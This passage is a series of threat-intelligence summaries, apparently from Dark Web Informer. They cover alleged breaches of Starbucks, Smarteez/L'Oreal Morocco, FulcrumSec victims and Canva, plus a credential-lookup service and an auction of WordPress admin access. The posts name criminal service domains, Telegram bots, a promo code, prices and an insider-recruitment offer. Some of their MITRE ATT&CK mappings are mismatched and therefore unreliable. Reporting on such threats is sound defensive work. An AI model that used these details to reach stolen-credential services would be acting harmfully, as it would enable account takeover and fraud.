- **Global Management and Internal Software**: Source code for the Global Management UI ("New Web UI") featuring a centralized dashboard for managing machines across international regions with global flag assets. Inventory Management Portal (b4-inv/) for tracking global hardware inventory, supply chain logistics, and vendor orders. Operational monitoring tools for log uploads and data-range downloads used by technicians to monitor machine health and performance. - **Developer Environment and Source Code**: JavaScript bundles containing hardcoded API endpoints, internal service URLs, and authentication logic. SCSS source files for management interface styling. Source maps (.map files) that allow minified production code to be reconstructed into human-readable format. Developer backup and staging folders (v-2a-upload-problem, b4-temp-download) that may contain temporary credentials or internal developer notes. - **Visual and Brand Assets**: Internal staff avatars and profile pictures for system administrators and developers. High-resolution Starbucks corporate branding and partner vendor logos (Blue Sparq) used in internal-only applications. The group provided proof and sample links via Mega.nz, with a Telegram channel for files exceeding 1GB. They are also actively recruiting corporate insiders with a 30/70 revenue split (30% to the insider, 70% to the group) with no upfront cost required. The actor's forum account was created in December 2025 with 29 posts, 7 threads, and a reputation of 1. The firmware and OT exposure is the most critical element of this breach. Hex files for beverage dispensers, espresso machine stepper motor configurations, and automated smoothie station code represent the proprietary control logic for physical machines deployed in tens of thousands of Starbucks locations globally. In the wrong hands, this could enable hardware manipulation, supply chain attacks against Starbucks equipment, or competitive reverse engineering of their beverage automation technology. ## Compromised Data Categories Beverage Dispenser Firmware (Hex) Mastrena II Espresso Machine Logic FreshBlends Smoothie Station Code Siren System / Blue Sparq Controllers Global Management UI Source Code Inventory Management Portal Operational Monitoring Tools JavaScript Bundles (API Endpoints) Source Maps (.map Files) SCSS Source Files Developer Backups & Staging Files Internal Staff Avatars Corporate Branding Assets Ingredient Ratios & Pricing Logic ## Image Preview [![Forum post by BlackVortex1 claiming ShadowByt3s breach of Starbucks with 10GB from sbux-assets S3 bucket including firmware, management tools, and proprietary hardware code](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/25915399316711038640.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/25915399316711038640.png) [![Developer environment source code details, visual brand assets, proof thumbnails, and insider recruitment offer with 30/70 revenue split](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/25915399316711038641.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/25915399316711038641.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1530 Data from Cloud Storage Compromised the sbux-assets S3 bucket to exfiltrate 10GB of proprietary source code, firmware, and internal management tools from Starbucks' cloud storage infrastructure. ](https://attack.mitre.org/techniques/T1530/) [ T1213 Data from Information Repositories Extracted structured assets from the S3 bucket spanning firmware binaries, management application source code, inventory portal code, and operational monitoring tools. ](https://attack.mitre.org/techniques/T1213/) [ T1552.001 Credentials In Files JavaScript bundles contain hardcoded API endpoints, internal service URLs, and authentication logic. Developer backup folders may contain temporary credentials and internal notes. ](https://attack.mitre.org/techniques/T1552/001/) [ T1588.004 Obtain Capabilities: Digital Certificates Firmware hex files and machine control logic for Mastrena II espresso machines, Siren System components, and Blue Sparq motor boards could enable hardware-level attacks or competitive reverse engineering. ](https://attack.mitre.org/techniques/T1588/004/) [ T1657 Financial Theft Extortion with an April 5 deadline, active insider recruitment with a 30/70 revenue split, and the threat to leak all proprietary IP if ransom is not paid. ](https://attack.mitre.org/techniques/T1657/) [ T1567 Exfiltration Over Web Service Uses Mega.nz for proof/sample distribution and Telegram channels for files exceeding 1GB, with forum posts for public advertisement of the breach. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Breach of Smarteez Exposes Full Production Database for L'Oreal Morocco Including 296 Pharmacies, 361K Sales Records, OAuth Secrets, and Competitive Intelligence Across Four L'Oreal Brands URL: https://darkwebinformer.com/alleged-breach-of-smarteez-exposes-full-production-database-for-loreal-morocco-including-296-pharmacies-361k-sales-records-oauth-secrets-and-competitive-intelligence-across-four-loreal-/ Last updated: 2026-04-01T16:08:46.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Smarteez Exposes Full Production Database for L'Oreal Morocco Including 296 Pharmacies, 361K Sales Records, OAuth Secrets, and Competitive Intelligence Across Four L'Oreal Brands April 1, 2026 - 1:19:41 AM UTC Morocco Cosmetics / Pharmaceutical Retail Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-01 01:19:41 UTC Threat Actor xNov Victim Smarteez / L'Oreal Morocco Industry Cosmetics / Pharmaceutical Retail Category Data Breach Brands Affected La Roche-Posay, Vichy, CeraVe, Dercos Pharmacies 296 Sales Records 361,000+ Data Range Mid-2023 to Early 2026 User Accounts 26 (PBKDF2) Price Free (Public Leak) Country Morocco ## Incident Overview A threat actor going by xNov has leaked the complete production database of Smarteez, a Moroccan digital factory based in Casablanca that was developed and operated exclusively for L'Oreal Morocco. Smarteez also serves other major enterprise clients including Total Maroc, SAHAM Assurance, and Carglass. The exposed data covers four L'Oreal brands active on the platform: La Roche-Posay, Vichy, CeraVe, and Dercos, spanning from mid-2023 through early 2026. The breach is comprehensive and covers the platform's entire operational footprint across multiple data categories: - **User Accounts**: 26 accounts including two platform superusers, one L'Oreal staff administrator, and approximately 20 field representatives deployed across Morocco in Casablanca, Rabat, Marrakech, Meknes, Fes, Kenitra, and Tanger. All passwords stored as PBKDF2 hashes. - **Pharmacy Network**: 296 pharmacies across Morocco, each recorded with full name, physical address, GPS coordinates, city, sales territory, and client reference codes, organized into 8 regional sectors with named territory managers. - **Sales Data**: Over 361,000 fully denormalized analytics records, 10,000 raw sales transactions, 10,000 purchase orders, and 10,000 no-purchase contact visits. The sample SQL data shows individual transaction-level detail including product names, barcodes, pricing, brand, pharmacy name, representative name, and timestamps. - **Product Catalog**: 2,495 references across 49 brand lines with barcodes, pricing, and article codes. - **Competitive Intelligence**: Over 1 million merchandising visit records and over 1 million competitive intelligence media files, representing L'Oreal Morocco's field intelligence on competitor shelf positioning and retail presence. - **Authentication Layer**: 22 OAuth2 applications with their client IDs and 128-character client secrets stored in plaintext, alongside 519 Django session records. - **Admin Audit Trail**: Full admin action log of 4,504 entries detailing every change made to the platform with timestamps and usernames. - **System Configuration**: The configuration table leaked the live Android APK download URL and current version identifier. - **Reporting Layer**: Aggregated KPI views per pharmacy, monthly and yearly sales comparisons across 2023 to 2025, and user activity data from a connected secondary database. This breach exposes L'Oreal Morocco's complete sales operation infrastructure, field intelligence apparatus, pharmacy distribution network, and product pricing strategy across the country. ## Compromised Data Categories Pharmacy Network (296 Locations) GPS Coordinates Sales Analytics (361K Records) Purchase Orders Product Catalog & Pricing Competitive Intelligence Media Field Representative Details Territory Manager Assignments OAuth2 Plaintext Client Secrets PBKDF2 Hashed Passwords Django Session Records Admin Action Logs Android APK Download URL KPI Reporting & Sales Comparisons ## Image Preview [![Forum post by xNov leaking Smarteez production database for L'Oreal Morocco with pharmacy network details, sales data, user accounts, and OAuth2 secrets across four brands](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/97737215648619074819.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/97737215648619074819.png) [![SQL INSERT statements showing denormalized sales analytics and sample transaction data from CeraVe product sales through Moroccan pharmacies with representative and pharmacy details](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/97737215648619074820.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/97737215648619074820.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in the Smarteez web platform to gain unauthorized access to the complete L'Oreal Morocco production database and application infrastructure. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts the entire production database including sales analytics, pharmacy records, product catalogs, purchase orders, and competitive intelligence data spanning nearly three years. ](https://attack.mitre.org/techniques/T1213/) [ T1552.001 Credentials In Files Exposed 22 OAuth2 applications with 128-character client secrets stored in plaintext, along with Django session records and PBKDF2 hashed user passwords. ](https://attack.mitre.org/techniques/T1552/001/) [ T1005 Data from Local System Collected system configuration data including the live Android APK download URL, version identifiers, and API call logs with endpoint details and response data. ](https://attack.mitre.org/techniques/T1005/) [ T1119 Automated Collection Over 1 million competitive intelligence media files and merchandising visit records were collected, representing L'Oreal Morocco's systematic field intelligence on competitor retail positioning. ](https://attack.mitre.org/techniques/T1119/) [ T1567 Exfiltration Over Web Service Published the complete production database as a password-protected free download on web forums with a publicly shared password and Telegram channel link. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### FulcrumSec Breaches Unique Computing, ReFocus AI, and Gennet AI Exposing 23,000 Insurance Policyholders, $797M in Premiums, Driver Licenses, SSNs, and Proprietary ML Models From a Single Unpatched AWS Account URL: https://darkwebinformer.com/fulcrumsec-breaches-unique-computing-refocus-ai-and-gennet-ai-exposing-23-000-insurance-policyholders-797m-in-premiums-driver-licenses-ssns-and-proprietary-ml-models-from-a-single-unpat/ Last updated: 2026-04-01T15:53:06.000Z Dark Web Informer - Cyber Threat Intelligence # FulcrumSec Breaches Unique Computing, ReFocus AI, and Gennet AI Exposing 23,000 Insurance Policyholders, $797M in Premiums, Driver Licenses, SSNs, and Proprietary ML Models From a Single Unpatched AWS Account April 1, 2026 - 12:52:53 AM UTC United States AI / Insurance / Healthcare Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-01 00:52:53 UTC Threat Actor FulcrumSec Victims Unique Computing / ReFocus AI / Gennet AI Industry AI / Insurance / Healthcare Category Data Breach Data Size 140 GB (Compressed) S3 Buckets 57 Policyholders 23,000+ Insured Premiums $796,847,366 Initial Access CVE-2025-55182 (React2Shell) Severity Critical Price Free (Public Leak) ## Incident Overview FulcrumSec has published a detailed breach report and 140GB data dump targeting three interconnected companies operating under a single AWS account: Unique Computing LLC (an 11-person AI consulting firm in Alexandria, Virginia), Gennet AI (a healthcare clinical documentation platform), and ReFocus AI (an insurance churn prediction platform serving 11+ insurance agency clients). The breach was achieved through CVE-2025-55182 (React2Shell) on an unpatched internet-facing host, which yielded ECS credentials providing access to 57 S3 buckets and the AWS Secrets Manager. The core finding is that all three companies, along with a nonprofit educational platform (Duaa.org) and personal developer projects, shared a single AWS account (086134439114) with no account separation, no environment isolation, and one set of credentials controlling everything. The actor describes this as having one compromised key that grants access to everything from a children's math curriculum to insurance policyholder driver license numbers. The insurance policyholder data is the most damaging component, totaling $796,847,366 in aggregate insured premiums across 11+ agencies: - **Patriotic Insurance (New York)**: Complete HawkSoft agency management export across 1,774 CSV files with 9,977,842 rows representing 1,249 unique policyholders. Includes full names, dates of birth, home addresses, driver license numbers (NY State 9-digit format), phone numbers, email addresses, 1,305 unique VINs, complete policy histories, claims data, billing records, employer names, income brackets, and occupations. - **Alliance Insurance Services (Winston-Salem, NC)**: Complete Salesforce policy management export with 96,624 rows containing 21,761 unique named insureds, 12,739 phone numbers, 29,186 addresses, 43,928 policy numbers, and $191,144,873 in total insured premium value across 27 states. Includes 727 FEIN/SSN values, 26 matching individual Social Security Number format, 7,231 individual medical policies, and 1,431 Medicare Advantage plans. - **Ohio Mutual Insurance Group**: 596,155 policy records covering 579 insurance agents across 7 states with $605,702,493 in aggregate premiums. This is a regional insurance carrier's complete auto insurance portfolio including the entire agent distribution network. Beyond the insurance data, the breach exposed ReFocus AI's proprietary ML pipeline including all 11 client churn prediction models (trained scikit-learn artifacts, client configuration YAMLs, EDA reports, preprocessed data, raw predictions, and 330+ timestamped run configurations), production model artifacts, feature engineering pipelines, and 713 data intake files spanning November 2021 through December 2024\. The Gennet AI clinical platform contained a ChromaDB vector database with synthetic FHIR patient data, h2oGPT LLM infrastructure, and LLM configurations for GPT-4o, Meta Llama 2, and Amazon Titan. Additional S3 buckets contained Databricks workspaces with biotech cell imaging analysis (Ovizio holographic microscopy), CycleGAN voice cloning models, 7 months of AWS billing and cost usage reports, 10 SageMaker ML workspaces, WorkMail archives linking the companies' principals, Elastic Beanstalk application deployments, personal developer buckets, and the Duaa.org children's education platform (Pre-K Pakistani mathematics curriculum). The actor verified the education content contains no children's PII. FulcrumSec's post directly addresses Unique Computing's CEO, naming them personally and accusing the company of criminal negligence for failing to patch CVE-2025-55182 for months after a patch was available, refusing to share infrastructure logs with ReFocus AI after the breach was discovered, and leaving the React hosts vulnerable even after being warned. The actor states ReFocus AI cooperated when contacted, acknowledged they could not pay because they were unable to confirm whether their data had been accessed by other parties, and that Unique Computing "went dark." FulcrumSec is offering to compensate affected Patriotic Insurance policyholders $70 in Monero for driver's license replacement costs, verified against the leaked data. ## Compromised Data Categories Driver License Numbers Social Security Numbers Full Names & Home Addresses Insurance Policy Records Claims & Billing Histories Medical Policy & Medicare Data Vehicle Identification Numbers Employer & Income Data Proprietary ML Models & Pipelines Client Configuration YAMLs AWS Secrets & ECS Credentials SageMaker ML Workspaces Biotech Cell Imaging Data Voice Cloning Models AWS Billing & Cost Reports WorkMail Email Archives Agent Distribution Networks ## Image Preview [![FulcrumSec breach post detailing Unique Computing, ReFocus AI, and Gennet AI shared AWS account compromise with insurance policyholder data from Patriotic Insurance, Alliance Insurance, and Ohio Mutual](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/42461523481004847847.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/42461523481004847847.png) [![Breach details showing Gennet AI clinical platform, personal Gmail as infrastructure, developer attribution, responsibility analysis, and complete S3 bucket data structure](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/42461523481004847848.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/42461523481004847848.png) [![Complete S3 bucket inventory including Gennet AI clinical platform, Databricks biotech workspace, AWS infrastructure, personal developer buckets, and Duaa.org education platform with no-children's-PII verification](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/42461523481004847849.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/42461523481004847849.png) [![FulcrumSec open letter to Unique Computing CEO, ReFocus AI, and affected insurance agencies with victim compensation offer and upcoming campaign announcements](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/42461523481004847850.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/42461523481004847850.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Exploited CVE-2025-55182 (React2Shell) on an unpatched internet-facing host to gain initial foothold and extract ECS credentials from the compromised container environment. ](https://attack.mitre.org/techniques/T1190/) [ T1552.005 Cloud Instance Metadata API Extracted ECS credentials from the compromised container that provided access to 57 S3 buckets and AWS Secrets Manager across the entire shared AWS account. ](https://attack.mitre.org/techniques/T1552/005/) [ T1530 Data from Cloud Storage Exfiltrated the complete contents of 57 S3 buckets containing insurance policyholder databases, ML models, clinical platform data, developer workspaces, and internal communications. ](https://attack.mitre.org/techniques/T1530/) [ T1213 Data from Information Repositories Extracted complete agency management system exports (HawkSoft, Salesforce) containing policyholder records, claims histories, billing data, and premium details across 11+ insurance agencies. ](https://attack.mitre.org/techniques/T1213/) [ T1589.001 Gather Victim Identity: Credentials Harvested driver license numbers, Social Security Numbers, FEIN values, home addresses, and employment details for 23,000+ insurance policyholders across New York, North Carolina, and 25 additional states. ](https://attack.mitre.org/techniques/T1589/001/) [ T1588.003 Obtain Capabilities: Code Signing Certificates Extracted proprietary ML model artifacts, scikit-learn trained models, client configuration files, and complete churn prediction pipelines representing significant trade secrets and intellectual property. ](https://attack.mitre.org/techniques/T1588/003/) [ T1567 Exfiltration Over Web Service Published the 140GB compressed dataset as a free download on web forums, with the actor maintaining both a clearnet site and Tor onion service for distribution. ](https://attack.mitre.org/techniques/T1567/) [ T1580 Cloud Infrastructure Discovery Enumerated the entire AWS account structure including 57 S3 buckets, SageMaker workspaces, Elastic Beanstalk deployments, Databricks environments, and WorkMail archives to map the full scope of accessible data. ](https://attack.mitre.org/techniques/T1580/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Vulta Intelligence Launches as Credential Lookup Service With 14.2 Billion Indexed Records, Telegram Bot, and Pay-Per-Query ULP Extraction URL: https://darkwebinformer.com/vulta-intelligence-launches-as-credential-lookup-service-with-14-2-billion-indexed-records-telegram-bot-and-pay-per-query-ulp-extraction/ Last updated: 2026-04-01T18:04:51.000Z Dark Web Informer - Cyber Threat Intelligence # Vulta Intelligence Launches as Credential Lookup Service With 14.2 Billion Indexed Records, Telegram Bot, and Pay-Per-Query ULP Extraction April 1, 2026 - 12:47:00 AM UTC N/A Cybercrime Service Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-01 00:47:00 UTC Threat Actor vultapower Service Name Vulta Intelligence Category Credential Lookup Service Indexed Records 14.2 Billion Data Format URL:Login:Password (ULP) Pricing $0.50 / 1,000 Lines Payment Crypto Access Methods Telegram Bot + Web Dashboard Network Open Web ## Incident Overview A threat actor going by vultapower has launched Vulta Intelligence, a credential lookup and extraction service that claims to index 14.2 billion records in URL:Login:Password (ULP) format. The service is accessible through both a Telegram bot and a web dashboard at vulta.pw, with real-time synchronization between the two interfaces. It's marketed as a tool for searching domains, emails, or keywords against massive databases of stolen credentials sourced from infostealer logs and combolists. The service works in a straightforward four-step process: - **Search**: Users type a domain, email address, or keyword into the Telegram bot or web interface. The demo screenshot shows a search for "binance" returning 4,146,129 hits. - **Results**: The system returns a hit count and asks how many lines the user wants to extract. - **Extraction**: Users select a tier (1,000 lines for $0.50, 5,000 lines for $2.50, 10,000 lines for $5.00) or enter a custom line count. - **Delivery**: Clean URL:Login:Password files are delivered instantly to the user's Telegram chat or web dashboard. The service advertises several key features: - **Deep ULP Extraction**: Access to massive databases with millisecond latency. - **Real-Time Sync**: Data is synchronized between the Telegram bot and web interface. - **High Accuracy**: Clean, formatted ULP results described as ready for use with existing tools. - **Instant Delivery**: Files delivered directly to Telegram or the dashboard. The ecosystem includes a Telegram bot (@VULTABOT), a web portal (@VULTANETWORKS), the main site (vulta.pw), and a support channel. A promotional code (WELCOMEVULTA) offers a 20% bonus on the first deposit. Credits are deposited via cryptocurrency. The 14.2 billion record claim and the Binance search returning 4.1 million hits suggest the database is aggregated from multiple large-scale infostealer log collections. ## Service Capabilities 14.2B Indexed Credential Records URL:Login:Password Extraction Domain Search Email Search Keyword Search Telegram Bot Delivery Web Dashboard Real-Time Sync Infostealer Log Aggregation Combolist Database ## Image Preview [![Forum post by vultapower launching Vulta Intelligence credential lookup service showing Telegram bot interface with Binance search returning 4.1 million hits](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/7895627893659872365987235789231.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/7895627893659872365987235789231.png) [![Vulta Intelligence features overview including deep ULP extraction, real-time sync, instant delivery, and ecosystem links](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/7895627893659872365987235789232.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/7895627893659872365987235789232.png) [![Vulta Intelligence pricing at $0.50 per 1,000 ULP lines, ecosystem contact details, and WELCOMEVULTA 20% bonus promotion code](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/7895627893659872365987235789233.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/7895627893659872365987235789233.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1589.001 Gather Victim Identity: Credentials Provides a searchable index of 14.2 billion stolen credentials in URL:Login:Password format, enabling targeted credential lookups against any domain, email, or service. ](https://attack.mitre.org/techniques/T1589/001/) [ T1078 Valid Accounts Extracted ULP credentials can be used directly for account takeover, enabling attackers to authenticate as legitimate users across banking, email, social media, and corporate platforms. ](https://attack.mitre.org/techniques/T1078/) [ T1110.004 Credential Stuffing The clean URL:Login:Password format is specifically designed for automated credential stuffing tools, enabling mass account takeover attempts across targeted services. ](https://attack.mitre.org/techniques/T1110/004/) [ T1102 Web Service Uses Telegram as a delivery mechanism and command interface for the credential lookup service, blending operations into normal messaging platform traffic. ](https://attack.mitre.org/techniques/T1102/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Cybercrime Website Leaderboard (Currently Elite Only) URL: https://darkwebinformer.com/cybercrime-website-leaderboard4574474574/ Last updated: 2026-07-21T19:35:32.000Z _This post is for subscribers on the Elite tier only._ ### Alleged Dataset Leak of Canva Exposes 900,000 User Records With Bcrypt Passwords, OAuth Providers, and Design Platform Usage Data URL: https://darkwebinformer.com/alleged-dataset-leak-of-canva-exposes-900-000-user-records-with-bcrypt-passwords-oauth-providers-and-design-platform-usage-data/ Last updated: 2026-03-31T17:51:39.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Database Leak of Canva Exposes 900,000 User Records With Bcrypt Passwords, OAuth Providers, and Design Platform Usage Data March 31, 2026 - 1:38:50 PM UTC Australia Technology / Design Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-31 13:38:50 UTC Threat Actor xorcat Victim Canva Industry Technology / Design Category Data Leak Total Records 900,000 Users Data Size 102 MB (Compressed) Password Hashing Bcrypt ($2y$10$) Price Free (Public Leak) Network Open Web Auth Methods Google, Facebook, Email Country Australia ## Incident Overview A threat actor going by xorcat has uploaded a database allegedly from Canva, the widely used Australian design platform with over 170 million monthly active users worldwide. The leaked dataset contains 900,000 user records and has been published as a free download for registered forum members. The actor provided a 20-record sample to demonstrate the data's structure and authenticity. The dataset contains the following fields per user record: - **Account Identifiers**: User IDs, email addresses, and full names. - **Credentials**: Passwords hashed with bcrypt ($2y$10$), which is a strong hashing algorithm. Unlike MD5 or SHA1 leaks, bcrypt hashes are computationally expensive to crack, though weak passwords are still vulnerable to targeted attacks. - **Authentication Providers**: Which OAuth method each user signed up with (Google, Facebook, or email), revealing which third-party accounts are linked to each Canva profile. - **Geographic Data**: Country codes for each user. - **Account Metadata**: Creation dates and last login timestamps, showing when accounts were created and when they were most recently active. - **Platform Usage**: Team/brand data, design counts, and storage usage, which reveals how actively each user engages with the platform and whether they are individual or enterprise users. It's worth noting that Canva previously experienced a major breach in May 2019 that affected 137 million users. This appears to be a separate, smaller dataset of 900,000 records. The inclusion of design counts, storage usage, and team/brand data is particularly useful for identifying high-value enterprise accounts, professional designers, and business users who may store sensitive client work on the platform. ## Compromised Data Categories User IDs Email Addresses Full Names Bcrypt Hashed Passwords OAuth Provider (Google/Facebook/Email) Country Codes Account Creation Dates Last Login Timestamps Team / Brand Data Design Counts Storage Usage ## Image Preview [![Forum post by xorcat uploading Canva database with 900,000 user records showing database info, compromised data fields, and 20-record sample](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/47717124258189148017.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/47717124258189148017.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in the design platform's web application or API to gain unauthorized access to the user database containing 900,000 records. ](https://attack.mitre.org/techniques/T1190/) [ T1555 Credentials from Password Stores Extracts bcrypt-hashed passwords from the database. While bcrypt is resistant to brute-force attacks, weak or reused passwords remain vulnerable to targeted cracking. ](https://attack.mitre.org/techniques/T1555/) [ T1213 Data from Information Repositories Extracts structured user data from the platform's database including personal profiles, authentication methods, usage metrics, and team/enterprise account details. ](https://attack.mitre.org/techniques/T1213/) [ T1589.002 Gather Victim Identity: Email Addresses Harvests 900,000 email addresses with associated names, country codes, and OAuth provider details for targeted phishing, credential stuffing, and social engineering campaigns. ](https://attack.mitre.org/techniques/T1589/002/) [ T1567 Exfiltration Over Web Service Publishes the stolen database as a free download on web forums, gated behind forum registration, with a vouch center for reputation verification. ](https://attack.mitre.org/techniques/T1567/) [ T1528 Steal Application Access Token The exposure of OAuth provider details (Google/Facebook) reveals which third-party accounts are linked, enabling targeted attacks against those connected authentication chains. ](https://attack.mitre.org/techniques/T1528/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Threat Actor Auctioning WordPress Admin Access to Spanish E-Commerce Site With REDSYS Payment Gateway and ~1,200 Monthly Card Orders URL: https://darkwebinformer.com/threat-actor-auctioning-wordpress-admin-access-to-spanish-e-commerce-site-with-redsys-payment-gateway-and-1-200-monthly-card-orders/ Last updated: 2026-03-31T17:35:51.000Z Dark Web Informer - Cyber Threat Intelligence # Threat Actor Auctioning WordPress Admin Access to Spanish E-Commerce Site With REDSYS Payment Gateway and \~1,200 Monthly Card Orders March 31, 2026 - 5:27:39 PM UTC Spain E-Commerce Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-31 17:27:39 UTC Threat Actor bobby\_killa Victim Spanish E-Commerce Site Industry E-Commerce Category Initial Access (Auction) Access Type WordPress Full Admin Payment Gateway REDSYS Monthly Orders \~1,150 - 1,200 Starting Bid $1,000 Bid Step $100 Blitz Price $3,000 Auction Duration 12 Hours PPP ## Incident Overview A threat actor going by bobby\_killa is auctioning full WordPress admin access to an unnamed Spanish e-commerce website that processes payments through REDSYS, Spain's dominant card payment processing system used by the vast majority of Spanish banks and online retailers. The listing is posted in the auctions section of a Russian-language forum and includes specific monthly order volumes, making this a financially motivated access sale rather than a data breach. The listing details the following: - **Access Level**: Full WordPress administrator with complete CMS control over the site. - **Log Access**: Available but described as "not public," suggesting the logs are accessible through the admin 